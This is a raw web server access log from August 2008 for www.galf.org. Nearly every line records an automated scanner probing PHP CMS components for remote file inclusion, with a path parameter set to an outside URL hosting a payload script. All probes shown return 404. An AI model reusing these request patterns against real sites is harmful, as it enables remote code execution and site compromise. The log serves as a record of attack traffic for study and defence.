210.188.205.31 - - [10/Aug/2008:17:01:25 -0700] "GET /logs/access_080623.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.188.205.31 - - [10/Aug/2008:17:01:26 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.188.205.31 - - [10/Aug/2008:17:01:26 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:17:03:19 -0700] "GET /logs/access_080616.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:17:03:19 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:17:03:19 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:17:03:35 -0700] "GET /logs/access_071001.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:17:03:38 -0700] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:17:03:43 -0700] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:17:03:55 -0700] "GET /logs/access_080616.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:17:03:55 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:17:03:55 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:17:05:15 -0700] "GET /logs/access_080616.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:17:05:20 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:17:05:21 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
67.19.51.194 - - [10/Aug/2008:17:06:47 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:17:06:57 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:17:06:57 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
200.72.251.210 - - [10/Aug/2008:17:07:02 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.luoghidellacultura.it/www//components/com_joomla-visites/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
200.72.251.210 - - [10/Aug/2008:17:07:02 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.luoghidellacultura.it/www//components/com_joomla-visites/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:17:07:14 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:17:07:14 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:17:07:41 -0700] "GET /logs/access_070917.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
70.85.201.66 - - [10/Aug/2008:17:09:15 -0700] "GET /logs/access_070924.log//oneadmin/newspublish/include.php?path[docroot]=http://go4wallpapers.com/babes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
70.85.201.66 - - [10/Aug/2008:17:09:15 -0700] "GET //oneadmin/newspublish/include.php?path[docroot]=http://go4wallpapers.com/babes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
70.85.201.66 - - [10/Aug/2008:17:09:16 -0700] "GET /logs//oneadmin/newspublish/include.php?path[docroot]=http://go4wallpapers.com/babes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
207.44.244.37 - - [10/Aug/2008:17:10:43 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
207.44.244.37 - - [10/Aug/2008:17:10:43 -0700] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
81.6.204.2 - - [10/Aug/2008:17:10:44 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
81.6.204.2 - - [10/Aug/2008:17:10:45 -0700] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
210.188.205.31 - - [10/Aug/2008:17:11:19 -0700] "GET /logs/access_080616.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.188.205.31 - - [10/Aug/2008:17:11:20 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.188.205.31 - - [10/Aug/2008:17:11:20 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
70.85.201.66 - - [10/Aug/2008:17:11:58 -0700] "GET /logs/access_070827.log//oneadmin/newspublish/include.php?path[docroot]=http://go4wallpapers.com/babes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.246.46.85 - - [10/Aug/2008:17:12:00 -0700] "GET /logs/access_071029.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
216.246.46.85 - - [10/Aug/2008:17:12:00 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
216.246.46.85 - - [10/Aug/2008:17:12:00 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
210.188.205.31 - - [10/Aug/2008:17:12:38 -0700] "GET /logs/access_080616.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.72.251.210 - - [10/Aug/2008:17:14:07 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.luoghidellacultura.it/www//components/com_joomla-visites/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
200.72.251.210 - - [10/Aug/2008:17:14:07 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.luoghidellacultura.it/www//components/com_joomla-visites/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
216.246.46.85 - - [10/Aug/2008:17:17:15 -0700] "GET /logs/access_080310.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
67.15.205.17 - - [10/Aug/2008:17:17:16 -0700] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
72.29.70.187 - - [10/Aug/2008:17:20:24 -0700] "GET /logs/access_080428.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
72.29.70.187 - - [10/Aug/2008:17:20:25 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
72.29.70.187 - - [10/Aug/2008:17:20:25 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:17:20:41 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.29.70.187 - - [10/Aug/2008:17:20:58 -0700] "GET /logs/access_080428.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
72.29.70.187 - - [10/Aug/2008:17:20:58 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
72.29.70.187 - - [10/Aug/2008:17:20:58 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
67.15.205.17 - - [10/Aug/2008:17:21:32 -0700] "GET /logs/access_071029.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.15.205.17 - - [10/Aug/2008:17:21:32 -0700] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
72.29.70.187 - - [10/Aug/2008:17:21:34 -0700] "GET /logs/access_080225.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
72.29.70.187 - - [10/Aug/2008:17:21:41 -0700] "GET /logs/access_080225.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:17:23:55 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
67.15.205.17 - - [10/Aug/2008:17:24:52 -0700] "GET /logs/access_080107.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:17:25:34 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.18.253 - - [10/Aug/2008:17:26:33 -0700] "GET /logs/access_080630.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
124.217.242.2 - - [10/Aug/2008:17:27:04 -0700] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.dominioncentre.org/oneadmin/_files/access.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
124.217.242.2 - - [10/Aug/2008:17:29:13 -0700] "GET /logs/access_071112.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.dominioncentre.org/oneadmin/_files/access.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:17:31:16 -0700] "GET /logs/access_080714.log//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:17:31:16 -0700] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:17:31:16 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:17:31:17 -0700] "GET /logs/access_080714.log//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:17:31:17 -0700] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:17:31:17 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:17:31:23 -0700] "GET /logs/access_080714.log//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:17:31:23 -0700] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:17:31:23 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:17:31:40 -0700] "GET /logs/access_080714.log//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:17:31:41 -0700] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:17:31:41 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:17:31:44 -0700] "GET /logs/access_080505.log//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:17:31:45 -0700] "GET /logs/access_080505.log//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:17:31:56 -0700] "GET /logs/access_080505.log//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:17:32:04 -0700] "GET /logs/access_080505.log//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:17:33:44 -0700] "GET /logs/access_070827.log/modules/My_eGallery/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:17:33:44 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
151.1.210.219 - - [10/Aug/2008:17:33:52 -0700] "GET //include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
125.24.33.188 - - [10/Aug/2008:17:34:17 -0700] "GET /logs/access_080421.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
125.24.33.188 - - [10/Aug/2008:17:34:18 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
125.24.33.188 - - [10/Aug/2008:17:34:20 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.51.194 - - [10/Aug/2008:17:34:27 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.188.205.31 - - [10/Aug/2008:17:34:37 -0700] "GET /logs/access_080714.log//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.188.205.31 - - [10/Aug/2008:17:34:37 -0700] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.188.205.31 - - [10/Aug/2008:17:34:38 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.188.205.31 - - [10/Aug/2008:17:35:05 -0700] "GET /logs/access_080505.log//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.188.205.31 - - [10/Aug/2008:17:35:12 -0700] "GET /logs/access_080714.log//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.188.205.31 - - [10/Aug/2008:17:35:12 -0700] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.188.205.31 - - [10/Aug/2008:17:35:13 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.169.158.65 - - [10/Aug/2008:17:35:13 -0700] "GET /logs/access_080623.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/zolahacker/scan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.158.65 - - [10/Aug/2008:17:35:13 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/zolahacker/scan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.158.65 - - [10/Aug/2008:17:35:14 -0700] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/zolahacker/scan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
124.217.242.2 - - [10/Aug/2008:17:35:19 -0700] "GET /logs/access_080630.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.dominioncentre.org/oneadmin/_files/access.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:17:35:32 -0700] "GET /logs/access_070806.log/modules/My_eGallery/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
125.24.33.188 - - [10/Aug/2008:17:35:34 -0700] "GET /logs/access_080512.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.188.205.31 - - [10/Aug/2008:17:35:59 -0700] "GET /logs/access_080505.log//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:17:37:13 -0700] "GET /logs/access_080623.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:17:37:18 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.169.158.65 - - [10/Aug/2008:17:38:20 -0700] "GET /logs/access_080616.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/zolahacker/scan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:17:38:29 -0700] "GET /logs/access_070827.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:17:38:29 -0700] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:17:39:37 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
89.111.172.23 - - [10/Aug/2008:17:39:47 -0700] "GET //include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:17:41:07 -0700] "GET /logs/access_071014.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
67.19.51.194 - - [10/Aug/2008:17:41:35 -0700] "GET /logs/access_080428.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.51.194 - - [10/Aug/2008:17:41:35 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.51.194 - - [10/Aug/2008:17:41:36 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
